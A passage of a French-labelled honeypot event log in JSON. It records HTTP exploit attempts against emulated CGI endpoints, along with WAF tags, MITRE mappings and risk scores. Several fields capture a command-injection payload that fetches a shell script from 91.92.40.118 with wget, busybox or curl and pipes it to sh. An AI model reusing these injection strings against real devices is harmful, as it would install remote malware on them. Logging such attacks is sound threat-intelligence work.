\u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxrh;busybox wget http:\/\/91.92.40.118\/wget.sh -\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 164\\r\\nConnection: close\\r\\n\\r\\ncmd=`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s zyxrh;busybox wget http:\/\/91.92.40.118\/wget.sh -\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022145375e3db28e5856867db2a8e3c4e1b54b67de5\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_help-cgi\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/remote_help-cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/remote_help-cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/remote_help-cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 16\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022], \u0022behavior_alert_count\u0022: 1, \u0022behavior_priority\u0022: 72}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022, \u0022http_cmd_injection\u0022, \u0022http_jwt_body\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_sensitive_path\u0022, \u0022http_ssrf_body\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]","anomalies":"[]","severity":10,"bytes_in":316},{"id":11860786,"ip":"45.156.87.213","ts":"2026-07-14 08:22:35.000000","proto":"tcp","src_port":60074,"dst_port":81,"service":"http","classification":"config_file_probe","waf_score":60,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 2, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022099cdff692d53e863101007eec84a42f224aacbc\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 306, \u0022payload_entropy\u0022: 5.195111331475781, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 17, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022b4bef8c54a2ea9c9dfc36a5b081989ae0307a535\u0022, \u0022event_fingerprint\u0022: \u00228ace03880dd892651470b6f6f36db49c801219f4\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022a54c28e76b3b5cc42ac12b2dc1912495\u0022, \u0022path_pattern_hash\u0022: \u0022d878a82020fc023d6ee51e23ab301813\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022query_string\u0022: \u0022cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022query_string\u0022: \u0022cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%60 HT\u0022, \u0022payload_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022a248d6269dc85fb8e5b6f2bcae0a3131c14f5281\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dlnas%\u2026\u0022, \u0022request_line\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bc\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add\u0026name=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dlnas%3Bb\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 9 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 9 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_cgi_bin\u0022, \u0022http_scanner_params\u0022, \u0022http_sensitive_path\u0022, \u0022http_suspicious_params\u0022, \u0022iot_http_endpoint\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, 